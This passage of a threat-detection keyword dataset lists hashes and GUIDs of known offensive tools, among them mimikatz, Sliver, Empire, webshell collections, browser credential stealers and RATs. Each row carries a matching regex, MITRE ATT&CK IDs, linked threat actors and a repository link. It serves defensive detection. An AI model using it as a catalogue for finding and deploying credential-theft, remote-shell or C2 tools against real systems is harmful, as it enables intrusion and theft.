"*1e1f0cff-ff7a-406d-bd82-e53809a5e93a*",".{0,1000}1e1f0cff\-ff7a\-406d\-bd82\-e53809a5e93a.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","The GUID of the VSTO's security public key","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22878"
"*1e2136c0b4bef6f7a9de7cd1d57d2c5f3dae7f90116b50454db495970d0fe251*",".{0,1000}1e2136c0b4bef6f7a9de7cd1d57d2c5f3dae7f90116b50454db495970d0fe251.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","#filehash","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","22879"
"*1e2744c89803f6afc884b214ba4a8f47dfc1725a4180d767630205feeead064b*",".{0,1000}1e2744c89803f6afc884b214ba4a8f47dfc1725a4180d767630205feeead064b.{0,1000}","offensive_tool_keyword","SharpWeb","SharpWeb - to export browser data including passwords - history - cookies - bookmarks and download records","T1555.003 - T1539 - T1602 - T1074.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/StarfireLab/SharpWeb","1","0","#filehash","N/A","10","8","703","79","2024-11-15T07:05:34Z","2023-10-09T06:48:23Z","22880"
"*1E2A1E78-ED0B-414B-A956-86232B1025BE*",".{0,1000}1E2A1E78\-ED0B\-414B\-A956\-86232B1025BE.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","22881"
"*1e2a2f0524221d5e07dd7a11d64cd1c1af7137d3cc022ef550a9aff5bcfec0cb*",".{0,1000}1e2a2f0524221d5e07dd7a11d64cd1c1af7137d3cc022ef550a9aff5bcfec0cb.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22882"
"*1e3ec12fbe9825c1eb044994d27c6fb97e5b2cee352d114b0ae6f8862e2a2dd5*",".{0,1000}1e3ec12fbe9825c1eb044994d27c6fb97e5b2cee352d114b0ae6f8862e2a2dd5.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","22883"
"*1e438cfed2d0cacdbf15d96360484541339463564d29c883afe513222df61b32*",".{0,1000}1e438cfed2d0cacdbf15d96360484541339463564d29c883afe513222df61b32.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22885"
"*1e47114546cda37a3ab03867aca5b78bb1ccaf41356e39d572a3ef398114d361*",".{0,1000}1e47114546cda37a3ab03867aca5b78bb1ccaf41356e39d572a3ef398114d361.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22886"
"*1E474090-96A7-433C-BFE6-0F8B45DECC42*",".{0,1000}1E474090\-96A7\-433C\-BFE6\-0F8B45DECC42.{0,1000}","offensive_tool_keyword","SharpFtpC2","A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems","T1071.002 - T1105 - T1090.001","TA0011","N/A","N/A","C2","https://github.com/PhrozenIO/SharpFtpC2","1","0","#GUIDproject","N/A","10","10","88","15","2023-11-09T10:37:20Z","2023-06-09T12:41:28Z","22887"
"*1e47ba612581f13591bdf9b76bf654b38d6f5bfe5d45846285dea5ebd3b22c26*",".{0,1000}1e47ba612581f13591bdf9b76bf654b38d6f5bfe5d45846285dea5ebd3b22c26.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22888"
"*1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9*",".{0,1000}1e4ff3139bfa4a040ce59f0efd10cca01d0c7da4e56c306b42f5e485b1a663e9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22889"
"*1e522857a95073072b70cbec8abcf0c0a3b4603390355fc077fac998273e017e*",".{0,1000}1e522857a95073072b70cbec8abcf0c0a3b4603390355fc077fac998273e017e.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","22890"
"*1e53b8773c0796d3bed82c67ced0fa96ec2565a697035826a8cec638c6454c7b*",".{0,1000}1e53b8773c0796d3bed82c67ced0fa96ec2565a697035826a8cec638c6454c7b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","22891"
"*1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95*",".{0,1000}1e5feda37def8d6575efcd1ba2c545dd0355f1810b4a7a6051bdd9d3701fdb95.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22895"
"*1e64a9795e35454189e28fdf181ba87960381f3d547a883048d84a119c4b92e0*",".{0,1000}1e64a9795e35454189e28fdf181ba87960381f3d547a883048d84a119c4b92e0.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22896"
"*1e661c6d9386dfb181a8c538c3f0b6c5531f9986ad0564eee847ac917430403a*",".{0,1000}1e661c6d9386dfb181a8c538c3f0b6c5531f9986ad0564eee847ac917430403a.{0,1000}","offensive_tool_keyword","rs-shell","rust reverse shell","T1071.004 - T1071.001 - T1573.002 - T1219 - T1059.001 - T1090.003","TA0011 - TA0005 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/BlWasp/rs-shell","1","0","#filehash","N/A","10","10","182","20","2024-09-03T21:48:21Z","2023-06-22T14:10:21Z","22898"
"*1e6f328bb3ca446969f0cf086b873081a5345b49fbb5f0bac9f7e5077cd74f76*",".{0,1000}1e6f328bb3ca446969f0cf086b873081a5345b49fbb5f0bac9f7e5077cd74f76.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","0","#filehash","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","22900"
"*1E70D62D-CC36-480F-82BB-E9593A759AF9*",".{0,1000}1E70D62D\-CC36\-480F\-82BB\-E9593A759AF9.{0,1000}","offensive_tool_keyword","PowerShx","Run Powershell without software restrictions.","T1059.001 - T1055.001 - T1055.012","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/iomoath/PowerShx","1","0","#GUIDproject","N/A","7","3","286","47","2021-09-08T03:44:10Z","2021-09-06T18:32:45Z","22902"
"*1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d*",".{0,1000}1e7a48d3a266ff3a1521da0804858af56093f9c736c06be2bc6b46502a776d5d.{0,1000}","offensive_tool_keyword","wso-webshell","wso php webshell","T1100 - T1027 - T1059","TA0003 ","N/A","EMBER BEAR - Sandworm","Persistence","https://github.com/mIcHyAmRaNe/wso-webshell","1","0","#filehash","N/A","10","4","376","211","2024-07-08T04:54:36Z","2017-05-04T23:34:02Z","22903"
"*1e7fb9e5dffcf6d3294e99417419221cebf322b760d854c978d9fcdf2994584b*",".{0,1000}1e7fb9e5dffcf6d3294e99417419221cebf322b760d854c978d9fcdf2994584b.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","22904"
"*1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f*",".{0,1000}1e82c733ecbf30e06bfa200e327fad167e79a55854a198f92afa2fa7d0f9337f.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22905"
"*1e83e7eb564b39cd4d600a3b9a906a2b59bbae26320b15b5065638ad267cc3cb*",".{0,1000}1e83e7eb564b39cd4d600a3b9a906a2b59bbae26320b15b5065638ad267cc3cb.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","#filehash","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","22907"
"*1e86687255a3e8b507716d855768ae9e6064152106c041a6aa4940bcafc81079*",".{0,1000}1e86687255a3e8b507716d855768ae9e6064152106c041a6aa4940bcafc81079.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","22908"
"*1e895d59aad4217f8c65ac581d28233b0f4415629d28a37aebf0743d07174848*",".{0,1000}1e895d59aad4217f8c65ac581d28233b0f4415629d28a37aebf0743d07174848.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22909"
"*1e8a611cf3a7ef7c4450f7d514fa940ae996df29c2ddfc2a8195f53834c14d05*",".{0,1000}1e8a611cf3a7ef7c4450f7d514fa940ae996df29c2ddfc2a8195f53834c14d05.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22910"
"*1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437*",".{0,1000}1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22913"
"*1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437*",".{0,1000}1e8efe80176f832df2a27862795208571fae916c29e755447305178528bcd437.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22914"
"*1e8fc1ed166a78bcb9075d3cd122af35d3bcca902a842bde00a0c6d515820cfa*",".{0,1000}1e8fc1ed166a78bcb9075d3cd122af35d3bcca902a842bde00a0c6d515820cfa.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","22915"
"*1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf*",".{0,1000}1e944ac6fd16e486ddf69e61510c37b8df113ace0e346223e8d6394c544b32bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22918"
"*1ea5b4bca8da1cbc3fe7cc396531423ead927ea709c9b5d5de20c931590c6a25*",".{0,1000}1ea5b4bca8da1cbc3fe7cc396531423ead927ea709c9b5d5de20c931590c6a25.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","22922"
"*1ea81f89cfaaf2fe3273f042bb4eaafc1046fbc3ceb146b79eee8a898a189b45*",".{0,1000}1ea81f89cfaaf2fe3273f042bb4eaafc1046fbc3ceb146b79eee8a898a189b45.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","22923"
"*1eb4e2cd15083c230408677777e1ddb5e31d04ae4b8c2cfdda52dd0e8438aa4d*",".{0,1000}1eb4e2cd15083c230408677777e1ddb5e31d04ae4b8c2cfdda52dd0e8438aa4d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22925"
"*1eb987e0-23a5-415e-9194-cd961314441b*",".{0,1000}1eb987e0\-23a5\-415e\-9194\-cd961314441b.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","#GUIDproject","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","22926"
"*1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294*",".{0,1000}1ebee3f2cc0a98db23a6bf0af4e5dd14bd8d21a4de9cbba58d43521b0bbe1294.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#filehash","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","22927"
"*1ec6f023ad651375efd66ae2a21f7609ed29b9fdfe725304bbaf219f5876350d*",".{0,1000}1ec6f023ad651375efd66ae2a21f7609ed29b9fdfe725304bbaf219f5876350d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","22929"
"*1ec72a3db270fd02e4a94d1bcf92bcf75637d0563d38ca63f296a04c62becec8*",".{0,1000}1ec72a3db270fd02e4a94d1bcf92bcf75637d0563d38ca63f296a04c62becec8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","22930"
"*1ec9f1961250dc8bd691d8c30c29cf96601fd0244cfa385e7f7f8e4bc0886b02*",".{0,1000}1ec9f1961250dc8bd691d8c30c29cf96601fd0244cfa385e7f7f8e4bc0886b02.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22931"
"*1eca6224c1b88fb220bbfa728cf27f260fb1ea27d5520167fd98ca25b0e5c1c8*",".{0,1000}1eca6224c1b88fb220bbfa728cf27f260fb1ea27d5520167fd98ca25b0e5c1c8.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","22932"
"*1ecac46b693f7ac81d6ac3198742d5b7729391f2ddc5c908f4a665c92c7dec7d*",".{0,1000}1ecac46b693f7ac81d6ac3198742d5b7729391f2ddc5c908f4a665c92c7dec7d.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","22933"
"*1ecb2406b796017446aa92b071d1f26f7fbf2a1a9c61f6b393437500518ec193*",".{0,1000}1ecb2406b796017446aa92b071d1f26f7fbf2a1a9c61f6b393437500518ec193.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","#filehash","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","22934"
"*1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364*",".{0,1000}1ecc20b0a11a89389b677aceccc9a47b518aaf088c5d6cac63302b27ad12b364.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","22935"
"*1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746*",".{0,1000}1ecf18a303bf9af2e5fc0f2cda9777bf9a759a88614edc0eb416ac4517fa3746.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","22936"
"*1ed3cce97e2fead6c5f784b3df60d104db026c106a049e9b9a613e7407822c1a*",".{0,1000}1ed3cce97e2fead6c5f784b3df60d104db026c106a049e9b9a613e7407822c1a.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22938"
"*1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c*",".{0,1000}1ee8207a97428b801b4587c40011193816bd114849e1ddfccc3a313260c20c0c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22942"
"*1ee8a433f650466547e5003bcf470eb70cfcaee27cbebae2f55adbcbacd6bf40*",".{0,1000}1ee8a433f650466547e5003bcf470eb70cfcaee27cbebae2f55adbcbacd6bf40.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 